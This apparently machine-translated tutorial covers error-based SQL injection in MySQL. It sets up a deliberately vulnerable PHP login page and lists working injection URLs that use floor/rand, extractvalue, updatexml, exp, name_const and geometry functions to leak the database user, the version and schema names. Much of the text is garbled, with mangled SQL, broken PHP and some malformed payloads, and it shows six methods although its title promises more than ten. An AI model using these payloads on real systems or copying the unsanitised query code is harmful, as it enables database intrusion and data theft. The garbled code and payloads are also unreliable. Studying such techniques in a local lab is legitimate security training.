SQL error injection of more than 10 kinds of injection methods

Error injection principle: Due to the conflict between Rand and Group+by, rand () is not a conditional field for order by, nor can it be a conditional field for group by. Floor (rand (0) * *) gets an indeterminate and duplicate value resulting in MySQL error floor: Rounding down, preserving only integral parts, rand (0)-0~1 Local Environment build database test injection posture:

Mysql> Create DatabaseSqli;mysql> Create Table User(IDint( One) not NULLAuto_incrementPrimary Key, namevarchar( -) not NULL, passvarchar( +) not NULL    ); MySQL> Insert  into User(Name, pass)Values('Admin', MD5 ('admin888')), ('Guest', MD5 ('Guest'));

The following files are created at the site root: index.php

<? php$conn=mysql_connect ("localhost", "root", "root");//connection database, account root, password rootif(! $conn) {die ("Connection failed:". Mysql_error ());} mysql_select_db ("Sqli", $conn);//Verify Login Infoif(Isset ($_get[' name '])&&Isset ($_get[' Pass ']) {$name=$_get[' name ']; $pass=MD5 ($_get[' Pass ']); $query="Select *  from User whereName='$name'  andPass='$pass'"; if($result=mysql_query ($query, $conn)) {$row=mysql_fetch_array ($result, MYSQL_ASSOC); if($row) {echo '<Script>Alert'Login successful!');</Script>"; }    } Else{die ("Operation error:".)    Mysql_error ()); }}mysql_close ();?><! DOCTYPE html><Html><Head>    <Title>Login</Title></Head><Body><Center>    <Form method="Get" action="">        <Label>Username:</Label><input type="text"Name="Name" value=""/><Br/>        <Label>Password:</Label><input type="Password" name="Pass" value=""/><Br/>        <input type="Submit" value="Login"/>    </Form></Center></Body></Html>

Index.php's PHP Verification login code is simple:

$name=$_get[' name ']; $pass=MD5 ($_get[' Pass ']); $query="Select *  from User whereName='$name'  andPass='$pass'";

$name parameter is an obvious injection point.

1, through Floor () Error:

http://localhost/index. Php?name='+or+ (Select+1+from (select+ Count (*), concat (User (), 0x7e,floor (rand (0))) x+from+information_schema.tables+group+by+x) a) +%23&pass=1 

# Burst database: Replace the keyword with the one you want to query

http://localhost/index. Php?name='+or+ (select 1 from (SELECT Count (*), Concat ((select (SELECT DISTINCT concat (0x7e,schema_name,0x7e) from Information_schema.schemata LIMIT 0,1)) From Information_schema.tables limit 0,1), floor (rand (0) *) x from Information_schema.tables Group by X) a) +%23&pass =1

2, through Extractvalue () Error:

http://localhost/index. Php?name='+or+extractvalue (1, Concat (User (), 0x7e,version ())) +%23&pass=1

3, through Updatexml () Error:

http://localhost/index. Php?name='+or+updatexml (1,concat (User ( ), 0x7e,version ()), 1) +%23&pass=1

4, through exp () Error: In detail, see: https://osandamalith.wordpress.com/2015/07/15/error-based-sql-injection-using-exp/

http://localhost/index. Php?name='+or+exp (~ (SELECT * FROM ( Select User ()) a) +%23&pass=1

5, through the Name_const (for the lower version) error:

http://localhost/index. Php?name='+or+ (SELECT * FROM (select Name_ CONST (Version (), 1), Name_const (version (), 1)) as X) +%23&pass=1

6, through Multipoint (), Multipolygon (), multilinestring (), linestring (), geometrycollection (), Polygon () and other functions of the error:

http//localhost/Index. php?name='+or+multipoint ((SELECT * FROM (SELECT * () () a) b) +%23&pass=1http://localhost/index.php?name= '+or+Multipolygon ((Select *  from(Select *  from(Select Database()) a) (b))+% at&Pass=1http://localhost/Index. php?name='+or+multilinestring ((SELECT * FROM (select User () a) b)) +%23&pass=1http://localhost/index.php? Name='+or+LINESTRING ((Select *  from(Select *  from(Select User()) a) (b))+% at&Pass=1http://localhost/Index. php?name='+or+geometrycollection ((SELECT * FROM (SELECT * () () a) b) +%23&pass=1http://localhost/ Index.php?name='+or+Polygon ((Select *  from(Select *  from(Select User()) a) (b))+% at&Pass=1

SQL error injection of more than 10 kinds of injection methods